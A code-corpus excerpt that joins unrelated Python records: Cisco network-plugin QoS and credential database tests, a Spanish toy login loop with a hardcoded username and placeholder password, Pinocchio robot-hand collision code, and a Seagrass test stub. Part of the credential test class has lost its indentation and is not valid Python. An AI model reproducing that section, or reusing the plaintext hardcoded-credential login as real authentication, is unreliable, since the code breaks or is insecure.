        # credential database access methods. For better code coverage,
        # this test suite will make calls to the QoS and credential database
        # access methods indirectly through the network plugin. The network
        # plugin's init function can be mocked out for this purpose.
        def new_network_plugin_init(instance):
            pass
        with mock.patch.object(network_plugin.PluginV2,
                               '__init__', new=new_network_plugin_init):
            self._network_plugin = network_plugin.PluginV2()

        # Wipe the database again when each test finishes.
        self.addCleanup(db.clear_db)
class CiscoNetworkQosDbTest(CiscoNetworkDbTest):
    """Unit tests for Cisco network QoS database model."""

    # Lightweight container for the QoS attributes exercised by these tests.
    QosObj = collections.namedtuple('QosObj', 'tenant qname desc')

    def _qos_test_obj(self, tnum, qnum, desc=None):
        """Create a Qos test object from a pair of numbers."""
        if desc is None:
            desc = 'test qos %s-%s' % (str(tnum), str(qnum))
        tenant = 'tenant_%s' % str(tnum)
        qname = 'qos_%s' % str(qnum)
        return self.QosObj(tenant, qname, desc)

    def _assert_equal(self, qos, qos_obj):
        """Assert that a QoS DB row matches the expected test object."""
        self.assertEqual(qos.tenant_id, qos_obj.tenant)
        self.assertEqual(qos.qos_name, qos_obj.qname)
        self.assertEqual(qos.qos_desc, qos_obj.desc)

    def test_qos_add_remove(self):
        """A created QoS can be deleted once; a second delete returns None."""
        qos11 = self._qos_test_obj(1, 1)
        qos = self._network_plugin.create_qos(qos11.tenant, qos11.qname,
                                              qos11.desc)
        self._assert_equal(qos, qos11)
        qos_id = qos.qos_id
        qos = self._network_plugin.delete_qos(qos11.tenant, qos_id)
        self._assert_equal(qos, qos11)
        qos = self._network_plugin.delete_qos(qos11.tenant, qos_id)
        self.assertIsNone(qos)

    def test_qos_add_dup(self):
        """Creating a QoS with a duplicate name raises QosNameAlreadyExists."""
        qos22 = self._qos_test_obj(2, 2)
        qos = self._network_plugin.create_qos(qos22.tenant, qos22.qname,
                                              qos22.desc)
        self._assert_equal(qos, qos22)
        qos_id = qos.qos_id
        with testtools.ExpectedException(c_exc.QosNameAlreadyExists):
            self._network_plugin.create_qos(qos22.tenant, qos22.qname,
                                            "duplicate 22")
        qos = self._network_plugin.delete_qos(qos22.tenant, qos_id)
        self._assert_equal(qos, qos22)
        qos = self._network_plugin.delete_qos(qos22.tenant, qos_id)
        self.assertIsNone(qos)

    def test_qos_get(self):
        """QoS rows are retrievable per tenant and invisible across tenants."""
        qos11 = self._qos_test_obj(1, 1)
        qos11_id = self._network_plugin.create_qos(qos11.tenant, qos11.qname,
                                                   qos11.desc).qos_id
        qos21 = self._qos_test_obj(2, 1)
        qos21_id = self._network_plugin.create_qos(qos21.tenant, qos21.qname,
                                                   qos21.desc).qos_id
        qos22 = self._qos_test_obj(2, 2)
        qos22_id = self._network_plugin.create_qos(qos22.tenant, qos22.qname,
                                                   qos22.desc).qos_id
        qos = self._network_plugin.get_qos_details(qos11.tenant, qos11_id)
        self._assert_equal(qos, qos11)
        qos = self._network_plugin.get_qos_details(qos21.tenant, qos21_id)
        self._assert_equal(qos, qos21)
        qos = self._network_plugin.get_qos_details(qos21.tenant, qos22_id)
        self._assert_equal(qos, qos22)
        # Unknown ids and cross-tenant lookups must both raise QosNotFound.
        with testtools.ExpectedException(c_exc.QosNotFound):
            self._network_plugin.get_qos_details(qos11.tenant, "dummyQosId")
        with testtools.ExpectedException(c_exc.QosNotFound):
            self._network_plugin.get_qos_details(qos11.tenant, qos21_id)
        with testtools.ExpectedException(c_exc.QosNotFound):
            self._network_plugin.get_qos_details(qos21.tenant, qos11_id)
        qos_all_t1 = self._network_plugin.get_all_qoss(qos11.tenant)
        self.assertEqual(len(qos_all_t1), 1)
        qos_all_t2 = self._network_plugin.get_all_qoss(qos21.tenant)
        self.assertEqual(len(qos_all_t2), 2)
        qos_all_t3 = self._network_plugin.get_all_qoss("tenant3")
        self.assertEqual(len(qos_all_t3), 0)

    def test_qos_update(self):
        """Renaming a QoS persists; renaming an unknown id raises QosNotFound."""
        qos11 = self._qos_test_obj(1, 1)
        qos11_id = self._network_plugin.create_qos(qos11.tenant, qos11.qname,
                                                   qos11.desc).qos_id
        # A None new_name is accepted without error.
        self._network_plugin.rename_qos(qos11.tenant, qos11_id,
                                        new_name=None)
        new_qname = "new qos name"
        new_qos = self._network_plugin.rename_qos(qos11.tenant, qos11_id,
                                                  new_qname)
        expected_qobj = self.QosObj(qos11.tenant, new_qname, qos11.desc)
        self._assert_equal(new_qos, expected_qobj)
        new_qos = self._network_plugin.get_qos_details(qos11.tenant, qos11_id)
        self._assert_equal(new_qos, expected_qobj)
        with testtools.ExpectedException(c_exc.QosNotFound):
            self._network_plugin.rename_qos(qos11.tenant, "dummyQosId",
                                            new_name=None)
class CiscoNetworkCredentialDbTest(CiscoNetworkDbTest):
"""Unit tests for Cisco network credentials database model."""
CredObj = collections.namedtuple('CredObj', 'cname usr pwd ctype')
def _cred_test_obj(self, tnum, cnum):
"""Create a Credential test object from a pair of numbers."""
cname = 'credential_%s_%s' % (str(tnum), str(cnum))
usr = 'User_%s_%s' % (str(tnum), str(cnum))
pwd = 'Password_%s_%s' % (str(tnum), str(cnum))
ctype = 'ctype_%s' % str(tnum)
return self.CredObj(cname, usr, pwd, ctype)
def _assert_equal(self, credential, cred_obj):
self.assertEqual(credential.type, cred_obj.ctype)
self.assertEqual(credential.credential_name, cred_obj.cname)
self.assertEqual(credential.user_name, cred_obj.usr)
self.assertEqual(credential.password, cred_obj.pwd)
def test_credential_add_remove(self):
cred11 = self._cred_test_obj(1, 1)
cred = cdb.add_credential(
cred11.cname, cred11.usr, cred11.pwd, cred11.ctype)
self._assert_equal(cred, cred11)
cred_id = cred.credential_id
cred = cdb.remove_credential(cred_id)
self._assert_equal(cred, cred11)
cred = cdb.remove_credential(cred_id)
self.assertIsNone(cred)
def test_credential_add_dup(self):
cred22 = self._cred_test_obj(2, 2)
cred = cdb.add_credential(
cred22.cname, cred22.usr, cred22.pwd, cred22.ctype)
self._assert_equal(cred, cred22)
cred_id = cred.credential_id
with testtools.ExpectedException(c_exc.CredentialAlreadyExists):
cdb.add_credential(
cred22.cname, cred22.usr, cred22.pwd, cred22.ctype)
cred = cdb.remove_credential(cred_id)
self._assert_equal(cred, cred22)
cred = cdb.remove_credential(cred_id)
self.assertIsNone(cred)
def test_credential_get_id(self):
cred11 = self._cred_test_obj(1, 1)
cred11_id = cdb.add_credential(
cred11.cname, cred11.usr, cred11.pwd, cred11.ctype).credential_id
cred21 = self._cred_test_obj(2, 1)
cred21_id = cdb.add_credential(
cred21.cname, cred21.usr, cred21.pwd, cred21.ctype).credential_id
cred22 = self._cred_test_obj(2, 2)
cred22_id = cdb.add_credential(
cred22.cname, cred22.usr, cred22.pwd, cred22.ctype).credential_id
cred = self._network_plugin.get_credential_details(cred11_id)
self._assert_equal(cred, cred11)
cred = self._network_plugin.get_credential_details(cred21_id)
self._assert_equal(cred, cred21)
cred = self._network_plugin.get_credential_details(cred22_id)
self._assert_equal(cred, cred22)
with testtools.ExpectedException(c_exc.CredentialNotFound):
self._network_plugin.get_credential_details("dummyCredentialId")
cred_all_t1 = self._network_plugin.get_all_credentials()
self.assertEqual(len(cred_all_t1), 3)
    def test_credential_get_name(self):
        """Ids are unique per credential and names resolve to the right row."""
        cred11 = self._cred_test_obj(1, 1)
        cred11_id = cdb.add_credential(
            cred11.cname, cred11.usr, cred11.pwd, cred11.ctype).credential_id
        cred21 = self._cred_test_obj(2, 1)
        cred21_id = cdb.add_credential(
            cred21.cname, cred21.usr, cred21.pwd, cred21.ctype).credential_id
        cred22 = self._cred_test_obj(2, 2)
        cred22_id = cdb.add_credential(
            cred22.cname, cred22.usr, cred22.pwd, cred22.ctype).credential_id
        # Ids generated for distinct credentials must not collide.
        self.assertNotEqual(cred11_id, cred21_id)
        self.assertNotEqual(cred11_id, cred22_id)
        self.assertNotEqual(cred21_id, cred22_id)
        cred = cdb.get_credential_name(cred11.cname)
        self._assert_equal(cred, cred11)
        cred = cdb.get_credential_name(cred21.cname)
        self._assert_equal(cred, cred21)
        cred = cdb.get_credential_name(cred22.cname)
        self._assert_equal(cred, cred22)
        # Unknown names raise CredentialNameNotFound.
        with testtools.ExpectedException(c_exc.CredentialNameNotFound):
            cdb.get_credential_name("dummyCredentialName")
    def test_credential_update(self):
        """Rename/update a credential; verify persistence and the error case."""
        cred11 = self._cred_test_obj(1, 1)
        cred11_id = cdb.add_credential(
            cred11.cname, cred11.usr, cred11.pwd, cred11.ctype).credential_id
        # Updating with all-None values must be an accepted no-op.
        self._network_plugin.rename_credential(cred11_id, new_name=None,
                                               new_password=None)
        new_usr = "new user name"
        new_pwd = "<PASSWORD>"
        new_credential = self._network_plugin.rename_credential(
            cred11_id, new_usr, new_pwd)
        expected_cred = self.CredObj(
            cred11.cname, new_usr, new_pwd, cred11.ctype)
        self._assert_equal(new_credential, expected_cred)
        # The update must be visible on a fresh fetch, not only in the return value.
        new_credential = self._network_plugin.get_credential_details(
            cred11_id)
        self._assert_equal(new_credential, expected_cred)
        # Renaming a non-existent credential raises CredentialNotFound.
        with testtools.ExpectedException(c_exc.CredentialNotFound):
            self._network_plugin.rename_credential(
                "dummyCredentialId", new_usr, new_pwd)
def test_get_credential_not_found_exception(self):
self.assertRaises(c_exc.CredentialNotFound,
self._network_plugin.get_credential_details,
"dummyCredentialId")
    def test_credential_delete_all_n1kv(self):
        """delete_all_n1kv_credentials removes only the 'n1kv' credentials."""
        cred_nexus_1 = self._cred_test_obj('nexus', 1)
        cred_nexus_2 = self._cred_test_obj('nexus', 2)
        cred_n1kv_1 = self.CredObj('n1kv-1', 'cisco', '123456', 'n1kv')
        cred_n1kv_2 = self.CredObj('n1kv-2', 'cisco', '123456', 'n1kv')
        cred_nexus_1_id = cdb.add_credential(
            cred_nexus_1.cname, cred_nexus_1.usr,
            cred_nexus_1.pwd, cred_nexus_1.ctype).credential_id
        cred_nexus_2_id = cdb.add_credential(
            cred_nexus_2.cname, cred_nexus_2.usr,
            cred_nexus_2.pwd, cred_nexus_2.ctype).credential_id
        cred_n1kv_1_id = cdb.add_credential(
            cred_n1kv_1.cname, cred_n1kv_1.usr,
            cred_n1kv_1.pwd, cred_n1kv_1.ctype).credential_id
        cred_n1kv_2_id = cdb.add_credential(
            cred_n1kv_2.cname, cred_n1kv_2.usr,
            cred_n1kv_2.pwd, cred_n1kv_2.ctype).credential_id
        cdb.delete_all_n1kv_credentials()
        # Nexus credentials survive the purge ...
        cred = cdb.get_credential(cred_nexus_1_id)
        self.assertIsNotNone(cred)
        cred = cdb.get_credential(cred_nexus_2_id)
        self.assertIsNotNone(cred)
        # ... while every n1kv credential is gone.
        self.assertRaises(c_exc.CredentialNotFound,
                          cdb.get_credential, cred_n1kv_1_id)
        self.assertRaises(c_exc.CredentialNotFound,
                          cdb.get_credential, cred_n1kv_2_id)
class CiscoCredentialStoreTest(base.BaseTestCase):
    """Cisco Credential Store unit tests."""

    def setUp(self):
        """Configure a fresh DB per test and register its teardown."""
        super(CiscoCredentialStoreTest, self).setUp()
        db.configure_db()
        self.addCleanup(db.clear_db)

    def test_cred_store_init_duplicate_creds_ignored(self):
        """Check that with multi store instances, dup creds are ignored."""
        # Create a device dictionary containing credentials for 1 switch.
        dev_dict = {
            ('dev_id', '1.1.1.1', cisco_constants.USERNAME): 'user_1',
            ('dev_id', '1.1.1.1', cisco_constants.PASSWORD): '<PASSWORD>',
            ('dev_id', '1.1.1.1', 'host_a'): '1/1',
            ('dev_id', '1.1.1.1', 'host_b'): '1/2',
            ('dev_id', '1.1.1.1', 'host_c'): '1/3',
        }
        with mock.patch.object(config, 'get_device_dictionary',
                               return_value=dev_dict):
            # Create and initialize 2 instances of credential store.
            cisco_credentials_v2.Store().initialize()
            cisco_credentials_v2.Store().initialize()
            # There should be only 1 switch credential in the database.
            self.assertEqual(len(cdb.get_all_credentials()), 1)
| StarcoderdataPython |
4821291 | <gh_stars>0
# Console login demo: prompt for a username and password; the account is
# locked after three consecutive failures.
# Fixes: user-facing typos corrected ("susario" -> "usuario",
# "Usario" -> "Usuario"); duplicated attempt-reporting code consolidated;
# commented-out dead code removed.
x = 0
while x <= 4:
    user = input("Dame tu usuario ")
    password = input("<PASSWORD> ")
    if user == "Alex" and password == "<PASSWORD>":
        print("Bienvenido " + user)
        x = 5  # sentinel value: terminate the loop after a successful login
    else:
        # Tell the user which part of the credentials was wrong.
        if user != "Alex" and password == "<PASSWORD>":
            print("Usuario Incorrecto")
        elif user == "Alex" and password != "<PASSWORD>":
            print("Contraseña incorrecta")
        else:
            print("Validar datos")
        print("intento " + str(x + 1))
        x += 1
    # Lock the account after the third consecutive failure.
    if x == 3:
        print("Usuario Bloqueado")
        x = 5
| StarcoderdataPython |
3551881 | <reponame>matthieuvigne/pinocchio
from math import pi
import numpy as np
from numpy.linalg import norm, pinv
import pinocchio as se3
from pinocchio.utils import cross, zero, rotate, eye
from display import Display
class Visual(object):
    '''
    Class representing one 3D mesh of the robot, to be attached to a joint. The class contains:
    * the name of the 3D objects inside Gepetto viewer.
    * the ID of the joint in the kinematic tree to which the body is attached.
    * the placement of the body with respect to the joint frame.
    This class is only used in the list Robot.visuals (see below).
    The visual are supposed mostly to be capsules. In that case, the object also contains
    radius and length of the capsule.
    The collision checking computes collision test, distance, and witness points.
    Using the supporting robot, the collision Jacobian returns a 1xN matrix corresponding
    to the normal direction.
    '''
    def __init__(self, name, jointParent, placement, radius=.1, length=None):
        '''Length and radius are used in case of capsule objects.

        NOTE(review): radius is only stored when length is given, so a visual
        created without a length has neither attribute and isCapsule() is False.
        '''
        self.name = name  # Name in gepetto viewer
        self.jointParent = jointParent  # ID (int) of the joint
        self.placement = placement  # placement of the body wrt joint, i.e. bodyMjoint
        if length is not None:
            self.length = length
            self.radius = radius

    def place(self, display, oMjoint):
        '''Move the viewer object to the world pose of its parent joint.'''
        oMbody = oMjoint * self.placement
        display.place(self.name, oMbody, False)

    def isCapsule(self):
        '''True when both capsule parameters (length, radius) are stored.'''
        return hasattr(self, 'length') and hasattr(self, 'radius')

    def collision(self, c2, data=None, oMj1=None, oMj2=None):
        '''Capsule-capsule proximity test against visual *c2*.

        Returns the signed distance between the two capsule surfaces
        (negative means interpenetration).  When the segment axes are further
        apart than 1e-3, also stores witness points (.w), the shared distance
        (.dist) and a normal frame (.R) on BOTH visuals as a side effect.
        '''
        if data is not None:
            oMj1 = data.oMi[self.jointParent]
            oMj2 = data.oMi[c2.jointParent]
        M1 = oMj1 * self.placement
        M2 = oMj2 * c2.placement
        assert(self.isCapsule() and c2.isCapsule())
        l1 = self.length
        r1 = self.radius
        l2 = c2.length
        r2 = c2.radius
        # Capsule segment endpoints expressed in the world frame.
        a1 = M1.act(np.matrix([0, 0, -l1 / 2]).T)
        b1 = M2.act(np.matrix([0, 0, -l2 / 2]).T)
        a2 = M1.act(np.matrix([0, 0, +l1 / 2]).T)
        b2 = M2.act(np.matrix([0, 0, +l2 / 2]).T)
        # Least-squares parameters of the closest points on the two segments.
        ab = pinv(np.hstack([a1 - a2, b2 - b1])) * (b2 - a2)
        # NOTE(review): `0 <= ab <= 1` is a chained comparison on a 2-element
        # matrix; bool() of a multi-element array raises in modern NumPy, so
        # this likely only works on the NumPy version this was written for --
        # verify before reuse.
        if all(0 <= ab <= 1):
            asat = bsat = False
            pa = a2 + ab[0, 0] * (a1 - a2)
            pb = b2 + ab[1, 0] * (b1 - b2)
        else:
            # A closest point saturates at a segment end: clamp one side,
            # then re-project the other side onto its segment.
            asat = bsat = True
            i = np.argmin(np.vstack([ab, 1 - ab]))
            pa = a2 if i == 0 else a1
            pb = b2 if i == 1 else b1
            if i == 0 or i == 2:  # fix a to pa, search b
                b = (pinv(b1 - b2) * (pa - b2))[0, 0]
                if b < 0:
                    pb = b2
                elif b > 1:
                    pb = b1
                else:
                    pb = b2 + b * (b1 - b2)
                    bsat = False
            else:  # fix b
                a = (pinv(a1 - a2) * (pb - a2))[0, 0]
                if a < 0:
                    pa = a2
                elif a > 1:
                    pa = a1
                else:
                    pa = a2 + a * (a1 - a2)
                    asat = False
        # Signed surface distance between the two capsules.
        dist = norm(pa - pb) - (r1 + r2)
        if norm(pa - pb) > 1e-3:
            # Compute witness points
            ab = pa - pb
            ab /= norm(ab)
            wa = pa - ab * r1
            wb = pb + ab * r2
            # Compute normal matrix
            x = np.matrix([1., 0, 0]).T
            # NOTE: from here r1/r2 are reused as rotation-frame columns,
            # shadowing the capsule radii above (the radii are no longer needed).
            r1 = cross(ab, x)
            if norm(r1) < 1e-2:
                x = np.matrix([0, 1., 0]).T
                r1 = cross(ab, x)
            r1 /= norm(r1)
            r2 = cross(ab, r1)
            R = np.hstack([r1, r2, ab])
            self.dist = dist
            c2.dist = dist
            self.w = wa
            c2.w = wb
            self.R = R
            c2.R = R
        # NOTE(review): when the axes are closer than 1e-3 the witness data
        # (.dist/.w/.R) is not refreshed -- confirm callers guard this case.
        return dist

    def jacobian(self, c2, robot, q):
        '''1xN collision Jacobian of the pair (self, c2) along the contact normal.'''
        Ja = se3.jacobian(robot.model, robot.data, q, self.jointParent, False, True)
        Jb = se3.jacobian(robot.model, robot.data, q, c2.jointParent, False, True)
        Xa = se3.SE3(self.R, self.w).action
        Xb = se3.SE3(c2.R, c2.w).action
        # Row 2 selects the z axis of the witness frame, i.e. the normal direction.
        J = (Xa * Ja)[2, :] - (Xb * Jb)[2, :]
        return J

    def displayCollision(self, viewer, name='world/wa'):
        '''Show this visual's witness patch in the viewer at the stored witness frame.'''
        viewer.viewer.gui.setVisibility(name, 'ON')
        viewer.place(name, se3.SE3(self.R, self.w))
class Robot(object):
    '''
    Define a class Robot with 7DOF (shoulder=3 + elbow=1 + wrist=3).
    The configuration is nq=7. The velocity is the same.
    The members of the class are:
    * viewer: a display encapsulating a gepetto viewer client to create 3D objects and place them.
    * model: the kinematic tree of the robot.
    * data: the temporary variables to be used by the kinematic algorithms.
    * visuals: the list of all the 'visual' 3D objects to render the robot, each element of the list being
    an object Visual (see above).
    CollisionPairs is a list of visual indexes.
    Reference to the collision pair is used in the collision test and jacobian of the collision
    (which are simply proxy method to methods of the visual class).
    '''
    def __init__(self):
        self.viewer = Display()
        self.visuals = []
        self.model = se3.Model()
        self.createHand()
        self.data = self.model.createData()
        self.q0 = zero(self.model.nq)
        # self.q0[3] = 1.0
        self.v0 = zero(self.model.nv)
        self.collisionPairs = []

    def createHand(self, root_id=0, prefix='', joint_placement=None):
        '''Build the hand kinematic tree (wrist, palm, three fingers, thumb)
        and register the matching Gepetto-viewer geometries in self.visuals.

        NOTE(review): the class docstring describes a 7-DOF arm, but this
        routine builds a multi-joint hand -- confirm which description is current.
        '''
        def trans(x, y, z):
            # Pure translation as an SE3 placement.
            return se3.SE3(eye(3), np.matrix([x, y, z]).T)
        def inertia(m, c):
            # Mass m at centre c with an isotropic rotational inertia of m**2.
            return se3.Inertia(m, np.matrix(c, np.double).T, eye(3) * m ** 2)
        def joint_name(body):
            return prefix + body + '_joint'
        def body_name(body):
            return 'world/' + prefix + body
        color = [red, green, blue, transparency] = [1, 1, 0.78, 1.0]
        joint_id = root_id
        cm = 1e-2  # all sizes below are expressed in centimetres
        # --- wrist ---
        joint_placement = joint_placement if joint_placement is not None else se3.SE3.Identity()
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('wrist'))
        self.model.appendBodyToJoint(joint_id, inertia(3, [0, 0, 0]), se3.SE3.Identity())
        # Palm bounding geometry: a box plus four capsules along its edges.
        L, W, H = 3 * cm, 5 * cm, 1 * cm
        self.viewer.viewer.gui.addSphere(body_name('wrist'), .02, color)
        self.viewer.viewer.gui.addBox(body_name('wpalm'), L / 2, W / 2, H, color)
        self.visuals.append(Visual(body_name('wpalm'), joint_id, trans(L / 2, 0, 0)))
        self.viewer.viewer.gui.addCapsule(body_name('wpalmb'), H, W, color)
        self.visuals.append(Visual(body_name('wpalmb'), joint_id, se3.SE3(rotate('x', pi / 2), zero(3)), H, W))
        self.viewer.viewer.gui.addCapsule(body_name('wpalmt'), H, W, color)
        pos = se3.SE3(rotate('x', pi / 2), np.matrix([L, 0, 0]).T)
        self.visuals.append(Visual(body_name('wpalmt'), joint_id, pos, H, W))
        self.viewer.viewer.gui.addCapsule(body_name('wpalml'), H, L, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([L / 2, -W / 2, 0]).T)
        self.visuals.append(Visual(body_name('wpalml'), joint_id, pos, H, L))
        self.viewer.viewer.gui.addCapsule(body_name('wpalmr'), H, L, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([L / 2, +W / 2, 0]).T)
        self.visuals.append(Visual(body_name('wpalmr'), joint_id, pos, H, L))
        # --- palm joint ---
        joint_placement = se3.SE3(eye(3), np.matrix([5 * cm, 0, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('palm'))
        self.model.appendBodyToJoint(joint_id, inertia(2, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('palm2'), 1 * cm, W, color)
        self.visuals.append(Visual(body_name('palm2'), joint_id, se3.SE3(rotate('x', pi / 2), zero(3)), H, W))
        FL = 4 * cm  # finger phalanx length
        palmIdx = joint_id
        # --- finger 1 (three phalanges, attached at +W/2 of the palm) ---
        joint_placement = se3.SE3(eye(3), np.matrix([2 * cm, W / 2, 0]).T)
        joint_id = self.model.addJoint(palmIdx, se3.JointModelRY(), joint_placement, joint_name('finger11'))
        self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('finger11'), H, FL - 2 * H, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
        self.visuals.append(Visual(body_name('finger11'), joint_id, pos, H, FL - 2 * H))
        joint_placement = se3.SE3(eye(3), np.matrix([FL, 0, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger12'))
        self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('finger12'), H, FL - 2 * H, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
        self.visuals.append(Visual(body_name('finger12'), joint_id, pos, H, FL - 2 * H))
        joint_placement = se3.SE3(eye(3), np.matrix([FL - 2 * H, 0, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger13'))
        self.model.appendBodyToJoint(joint_id, inertia(.3, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addSphere(body_name('finger13'), H, color)
        self.visuals.append(Visual(body_name('finger13'), joint_id, trans(2 * H, 0, 0), H, 0))
        # --- finger 2 (middle finger, attached on the palm axis) ---
        joint_placement = se3.SE3(eye(3), np.matrix([2 * cm, 0, 0]).T)
        joint_id = self.model.addJoint(palmIdx, se3.JointModelRY(), joint_placement, joint_name('finger21'))
        self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('finger21'), H, FL - 2 * H, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
        self.visuals.append(Visual(body_name('finger21'), joint_id, pos, H, FL - 2 * H))
        joint_placement = se3.SE3(eye(3), np.matrix([FL, 0, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger22'))
        self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('finger22'), H, FL - 2 * H, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
        self.visuals.append(Visual(body_name('finger22'), joint_id, pos, H, FL - 2 * H))
        # NOTE(review): the tip joint here is placed at FL - H (not FL - 2*H as
        # for the other fingers) and its sphere at trans(H, ...) -- confirm intended.
        joint_placement = se3.SE3(eye(3), np.matrix([FL - H, 0, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger23'))
        self.model.appendBodyToJoint(joint_id, inertia(.3, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addSphere(body_name('finger23'), H, color)
        self.visuals.append(Visual(body_name('finger23'), joint_id, trans(H, 0, 0), H, 0))
        # --- finger 3 (attached at -W/2 of the palm) ---
        joint_placement = se3.SE3(eye(3), np.matrix([2 * cm, -W / 2, 0]).T)
        joint_id = self.model.addJoint(palmIdx, se3.JointModelRY(), joint_placement, joint_name('finger31'))
        self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('finger31'), H, FL - 2 * H, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
        self.visuals.append(Visual(body_name('finger31'), joint_id, pos, H, FL - 2 * H))
        joint_placement = se3.SE3(eye(3), np.matrix([FL, 0, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger32'))
        self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('finger32'), H, FL - 2 * H, color)
        pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
        self.visuals.append(Visual(body_name('finger32'), joint_id, pos, H, FL - 2 * H))
        joint_placement = se3.SE3(eye(3), np.matrix([FL - 2 * H, 0, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger33'))
        self.model.appendBodyToJoint(joint_id, inertia(.3, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addSphere(body_name('finger33'), H, color)
        self.visuals.append(Visual(body_name('finger33'), joint_id, trans(2 * H, 0, 0), H, 0))
        # --- thumb ---
        joint_placement = se3.SE3(eye(3), np.matrix([1 * cm, -W / 2 - H * 1.5, 0]).T)
        # NOTE(review): parent joint id is hard-coded to 1 (the wrist when
        # root_id == 0); this ignores root_id and would be wrong if the hand
        # is attached elsewhere -- verify.
        joint_id = self.model.addJoint(1, se3.JointModelRY(), joint_placement, joint_name('thumb1'))
        self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('thumb1'), H, 2 * cm, color)
        pos = se3.SE3(rotate('z', pi / 3) * rotate('x', pi / 2), np.matrix([1 * cm, -1 * cm, 0]).T)
        # NOTE(review): only a radius (2*cm) is passed, so this Visual stores
        # no capsule parameters and isCapsule() is False -- likely a missing
        # length argument; confirm.
        self.visuals.append(Visual(body_name('thumb1'), joint_id, pos, 2 * cm))
        joint_placement = se3.SE3(rotate('z', pi / 3) * rotate('x', pi), np.matrix([3 * cm, -1.8 * cm, 0]).T)
        joint_id = self.model.addJoint(joint_id, se3.JointModelRZ(), joint_placement, joint_name('thumb2'))
        self.model.appendBodyToJoint(joint_id, inertia(.4, [0, 0, 0]), se3.SE3.Identity())
        self.viewer.viewer.gui.addCapsule(body_name('thumb2'), H, FL - 2 * H, color)
        pos = se3.SE3(rotate('x', pi / 3), np.matrix([-0.7 * cm, .8 * cm, -0.5 * cm]).T)
        self.visuals.append(Visual(body_name('thumb2'), joint_id, pos, H, FL - 2 * H))
        # Prepare some patches to represent collision points. Yet unvisible.
        for i in range(10):
            self.viewer.viewer.gui.addCylinder('world/wa%i' % i, .01, .003, [1.0, 0, 0, 1])
            self.viewer.viewer.gui.addCylinder('world/wb%i' % i, .01, .003, [1.0, 0, 0, 1])
            self.viewer.viewer.gui.setVisibility('world/wa%i' % i, 'OFF')
            self.viewer.viewer.gui.setVisibility('world/wb%i' % i, 'OFF')

    def checkCollision(self, pairIndex):
        '''Distance of collision pair *pairIndex*; proxy to Visual.collision.'''
        ia, ib = self.collisionPairs[pairIndex]
        va = self.visuals[ia]
        vb = self.visuals[ib]
        dist = va.collision(vb, self.data)
        return dist

    def collisionJacobian(self, pairIndex, q):
        '''Normal-direction Jacobian of a collision pair; proxy to Visual.jacobian.'''
        ia, ib = self.collisionPairs[pairIndex]
        va = self.visuals[ia]
        vb = self.visuals[ib]
        return va.jacobian(vb, self, q)

    def displayCollision(self, pairIndex, meshIndex, onlyOne=False):
        '''Show the witness patches of a collision pair in the viewer.'''
        ia, ib = self.collisionPairs[pairIndex]
        va = self.visuals[ia]
        vb = self.visuals[ib]
        va.displayCollision(self.viewer, 'world/wa%i' % meshIndex)
        vb.displayCollision(self.viewer, 'world/wb%i' % meshIndex)
        self.viewer.viewer.gui.setVisibility('world/wa%i' % meshIndex, 'ON')
        self.viewer.viewer.gui.setVisibility('world/wb%i' % meshIndex, 'ON')

    def display(self, q):
        '''Run forward kinematics at configuration q and refresh all visuals.'''
        se3.forwardKinematics(self.model, self.data, q)
        for visual in self.visuals:
            visual.place(self.viewer, self.data.oMi[visual.jointParent])
        self.viewer.viewer.gui.refresh()
| StarcoderdataPython |
8001279 | <reponame>kernelmethod/Seagrass
import seagrass
import sys
import unittest
import warnings
from collections import Counter, defaultdict
from seagrass import auto, get_current_event
from seagrass.hooks import CounterHook
from test.utils import SeagrassTestCaseMixin, req_python_version
# Define the example class inside a temporary global auditor so that the
# audit(auto) decoration can resolve an auditor at import time.
with seagrass.create_global_auditor() as _:
    class ExampleClass:
        # Test class used to check how functions are auto-named by Seagrass
        @staticmethod
        @seagrass.audit(auto)
        def say_hello(name: str) -> str:
            """Return a greeting; audited under an auto-derived event name."""
            return f"Hello, {name}!"
